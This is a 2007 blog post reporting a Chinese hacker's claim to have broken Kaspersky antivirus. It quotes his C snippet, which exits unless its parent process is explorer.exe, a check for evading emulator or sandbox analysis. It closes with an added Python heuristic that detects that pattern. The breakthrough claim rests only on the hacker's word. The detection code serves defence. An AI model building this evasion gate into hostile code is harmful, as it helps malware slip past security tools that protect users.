Nov 17 2007
Chinese hacker xyzreg claims to have broken Kaspersky Anti-Virus Technology
Kaspersky's latest virus-detection technology broken by a Chinese hacker
In the headlines on Hackbase, one of China’s largest hacker websites, claims are being made that a Chinese hacker/researcher named xyzreg has broken Kaspersky’s newest anti-virus technology. His announcement was made at the Chinese 2007 Security Focus Summit. During the summit he demonstrated how to penetrate the security software defenses of Kaspersky, Norton and McAfee. He has posted the method for breaking Kaspersky 7.0 on his blog.
More details as I can find them.
UPDATE: Found xyzreg’s blog. I will post the information but please remember I am just a linguist and this might as well be in Chinese…wait…anyway here is what he posted:
[2007/11/09 13:46 | by xyzreg ]
It only took me several lines (10 or so) of code and I broke it, it didn’t even take all my skill.
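#include <windows.h>
#include <tlhelp32.h>
#include <string.h>

DWORD fpid, epid;   /* fpid: PID of this process's parent; epid: PID of explorer.exe */

/* Walk the process list once and record both PIDs. */
void VMM()
{
    PROCESSENTRY32 pe;
    HANDLE hkz = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    pe.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hkz, &pe))
    {
        do
        {
            if (pe.th32ProcessID == GetCurrentProcessId())
            {
                fpid = pe.th32ParentProcessID;
            }
            if (stricmp(pe.szExeFile, "explorer.exe") == 0)
            {
                epid = pe.th32ProcessID;
            }
        }
        while (Process32Next(hkz, &pe));
    }
    CloseHandle(hkz);   /* release the snapshot handle */
}
Main Function:
    VMM();
    /* Return immediately unless this process's parent is explorer.exe. */
    if (fpid != epid)
        return 0;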
You don’t understand? Then don’t look at it. It’s common sense, common sense…
UPDATE: The real name of xyzreg appears to be 张翼(Zhang Yi).
MORE UPDATES: Zhang Yi attended the Xcon 2007 Conference that I was at in 2006.
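The quoted snippet returns early unless the process's parent is explorer.exe. As an added example (not from the original post or from xyzreg), this Python triage helper flags files that carry the same Toolhelp API names together with an explorer.exe literal, so an analyst knows to inspect them for a parent-process gate; the function names and sample buffers are constructed for illustration.

```python
import re

# API names and the string literal used by the snippet quoted on this page.
REQUIRED_APIS = (b"CreateToolhelp32Snapshot", b"Process32First",
                 b"Process32Next", b"GetCurrentProcessId")
PARENT_NAME = b"explorer.exe"


def _utf16le(s: bytes) -> bytes:
    """Widen ASCII bytes to UTF-16LE, the layout of wide string literals."""
    return s.decode("ascii").encode("utf-16-le")


def _contains(data: bytes, needle: bytes, ignore_case: bool = False) -> bool:
    """True if needle occurs in data as an ASCII or UTF-16LE byte sequence."""
    flags = re.IGNORECASE if ignore_case else 0
    return any(re.search(re.escape(n), data, flags)
               for n in (needle, _utf16le(needle)))


def triage(data: bytes) -> dict:
    """Report which parent-process-check indicators a file contains.

    'review' is a heuristic hint only: process listers and installers use the
    same APIs, so a hit means "read the code", not "malicious".
    """
    apis = [a.decode() for a in REQUIRED_APIS if _contains(data, a)]
    has_name = _contains(data, PARENT_NAME, ignore_case=True)
    return {
        "apis_found": apis,
        "explorer_literal": has_name,
        "review": len(apis) == len(REQUIRED_APIS) and has_name,
    }


# Constructed sample buffers (not real binaries): NUL-separated names,
# roughly as import names and string literals sit inside a PE file.
SAMPLE_GATED = b"\x00".join([b"MZ", b"KERNEL32.dll", *REQUIRED_APIS, b"Explorer.EXE"])
SAMPLE_LISTER = b"\x00".join([b"MZ", b"CreateToolhelp32Snapshot",
                              b"Process32First", b"Process32Next", b"svchost.exe"])
SAMPLE_WIDE = b"\x00".join([b"MZ", *REQUIRED_APIS]) + b"\x00" + _utf16le(PARENT_NAME)

if __name__ == "__main__":
    for name, buf in (("gated", SAMPLE_GATED), ("lister", SAMPLE_LISTER),
                      ("wide", SAMPLE_WIDE)):
        print(name, triage(buf))
```
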


